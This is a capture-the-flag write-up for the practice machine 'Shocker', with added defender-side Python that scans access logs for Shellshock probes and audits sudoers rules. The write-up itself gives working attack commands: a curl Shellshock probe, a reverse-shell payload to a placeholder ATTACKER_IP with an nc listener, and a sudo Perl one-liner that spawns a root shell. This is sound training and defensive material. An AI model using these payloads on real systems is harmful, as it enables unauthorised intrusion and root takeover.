Shocker is a classic Shellshock exploitation machine.
A vulnerable CGI script under /cgi-bin/ allows remote command execution via the Shellshock bug.
Privilege escalation is trivial through a sudo-allowed Perl binary.
Target: shocker.htb
Initial vector: Shellshock RCE via CGI script
Privilege escalation: sudo Perl → root
Nmap:
80/tcp   http (Apache 2.4.18)
2222/tcp ssh  (OpenSSH 7.2p2)
Directory fuzzing reveals:
/cgi-bin/
Fuzzing inside /cgi-bin/:
$ wfuzz -w directory-list-2.3-medium.txt -z list,sh,pl,py,cgi \
    --hc 404 http://shocker.htb/cgi-bin/FUZZ.FUZ2Z
-> user.sh
A CGI script named user.sh is present — a strong indicator of Shellshock vulnerability.
Test the vulnerability by sending a bash function definition in the User-Agent header (the `echo` emits the blank line that terminates the CGI response headers, so the command output comes back in the response body):
$ curl -s -X GET "http://shocker.htb/cgi-bin/user.sh" \
-H 'User-Agent: () { :; }; echo; /usr/bin/whoami'
If the output is www-data, the script is vulnerable.
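As an added defender-side example (not part of the original writeup), the following Python scans Apache combined-format access log lines for the `() {` function-definition prefix that the User-Agent probe above relies on, checking the User-Agent, Referer and the (URL-decoded) request line, since any of them is exported into the CGI environment. The log lines are constructed for this example; the IP addresses and timestamps are placeholders, not data from the box.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock trigger: bash parses a value beginning with "() {" as a function
# definition. Whitespace between the tokens is optional, so match it loosely.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample log lines (placeholder IPs/timestamps): two probes, one
# payload smuggled through the Referer, and two benign requests.
SAMPLE_LOG = [
    '10.10.14.5 - - [05/Oct/2024:12:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo; /usr/bin/whoami"',
    '10.10.14.5 - - [05/Oct/2024:12:00:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 90 "-" "(){:;}; /usr/bin/id"',
    '10.10.14.7 - - [05/Oct/2024:12:00:40 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { :; }; echo; /usr/bin/id" "curl/7.88.1"',
    '10.10.14.9 - - [05/Oct/2024:12:01:00 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"',
    '10.10.14.9 - - [05/Oct/2024:12:01:30 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "curl/7.88.1"',
]


def parse_combined(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def is_shellshock_attempt(entry):
    """True if any CGI-exported field carries a bash function-definition prefix."""
    candidates = (entry["ua"], entry["referer"], unquote(entry["request"]))
    return any(SHELLSHOCK_RE.search(value) for value in candidates)


def scan_log(lines):
    """Return (ip, request, user_agent) for every line that looks like a Shellshock attempt."""
    hits = []
    for line in lines:
        entry = parse_combined(line)
        if entry is not None and is_shellshock_attempt(entry):
            hits.append((entry["ip"], entry["request"], entry["ua"]))
    return hits


if __name__ == "__main__":
    for ip, request, ua in scan_log(SAMPLE_LOG):
        print(f"{ip}  {request}  UA={ua!r}")
```

A hit against a path under /cgi-bin/ on a host that still runs an unpatched bash is the alert that matters; the request line and the response size (command output vs. the script's normal page) tell you whether the probe succeeded. The durable fix is patching bash (CVE-2014-6271 and its follow-ups) and not exposing shell-script CGI handlers at all.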
Listener:
$ nc -nlvp 777
Exploit:
$ curl -s -X GET "http://shocker.htb/cgi-bin/user.sh" \
-H 'User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/ATTACKER_IP/777 0>&1'
A shell is obtained as www-data.
Alternatively, Shellshock can be tested using Nmap:
$ sudo nmap --script http-shellshock -p80 shocker.htb \
    --script-args uri=/cgi-bin/user.sh,cmd=/usr/bin/id
Check sudo permissions:
$ sudo -l
-> (root) NOPASSWD: /usr/bin/perl
Perl can be used to spawn a root shell:
$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
Root access obtained.
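As an added example, not taken from the writeup: a small audit script that parses a sudoers file and flags rules granting shell-capable interpreters such as Perl, the misconfiguration this box exploits. The sudoers content is constructed for the example; the `www-data` rule mirrors the `sudo -l` output above, and the other users (`ops`, `backup`, `deploy`) are invented.

```python
import re
from os.path import basename

# Interpreters and shells that can spawn an arbitrary process. Granting the
# bare binary via sudo is equivalent to granting a root shell.
SHELL_CAPABLE = {
    "perl", "python", "python2", "python3", "ruby", "php", "lua", "node",
    "bash", "sh", "dash", "zsh", "ksh", "awk", "gawk", "vi", "vim", "less", "find",
}

# Tags that may prefix a command in a sudoers user specification.
TAGS = {
    "NOPASSWD", "PASSWD", "SETENV", "NOSETENV", "NOEXEC", "EXEC",
    "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT", "MAIL", "NOMAIL",
}

# user host=(runas) [TAG:] cmd[, cmd ...]   (aliases and Defaults are skipped)
SPEC_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$'
)

# Constructed sample; the www-data line mirrors the sudo -l output on the box.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
# service account handed an interpreter without a password
www-data ALL=(root) NOPASSWD: /usr/bin/perl
ops      ALL=(ALL) NOPASSWD: ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data /mnt/backup
deploy   ALL=(root) /usr/bin/systemctl restart app
"""


def parse_user_specs(text):
    """Yield (user, host, runas, tags, command) for each command of each user spec."""
    skip = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias", "@include")
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line or line.startswith(skip):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        runas = m.group("runas") or "root"
        tags = set()                                  # a tag persists across the comma list
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            while True:                               # peel leading TAG: prefixes
                head, sep, rest = cmd.partition(":")
                tag = head.strip().upper()
                if not sep or tag not in TAGS:
                    break
                tags.discard("PASSWD" if tag == "NOPASSWD" else "NOPASSWD")
                tags.add(tag)
                cmd = rest.strip()
            yield m.group("user"), m.group("host"), runas, frozenset(tags), cmd


def audit_sudoers(text):
    """Return findings for rules that amount to handing out a root shell."""
    findings = []
    for user, host, runas, tags, cmd in parse_user_specs(text):
        nopasswd = "NOPASSWD" in tags
        binary = basename(cmd.split()[0]) if cmd else ""
        if cmd == "ALL" and nopasswd:
            findings.append({"user": user, "runas": runas, "command": cmd,
                             "severity": "critical",
                             "reason": "any command without a password"})
        elif binary in SHELL_CAPABLE:
            findings.append({"user": user, "runas": runas, "command": cmd,
                             "severity": "critical" if nopasswd else "high",
                             "reason": f"{binary} can spawn an arbitrary process as {runas}"})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f['severity']}] {f['user']}: {f['command']}  ({f['reason']})")
```

The `backup` and `deploy` rules are not flagged because `rsync` and `systemctl` with fixed arguments cannot trivially be turned into a shell; an interpreter rule, by contrast, should never name the bare binary, but a fixed, root-owned script, and should require a password unless there is a documented reason not to.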
Shocker is a straightforward exploitation path: discover a CGI script, exploit Shellshock for RCE, and escalate to root via a sudo-allowed Perl binary. A perfect example of classic web exploitation combined with simple privilege escalation.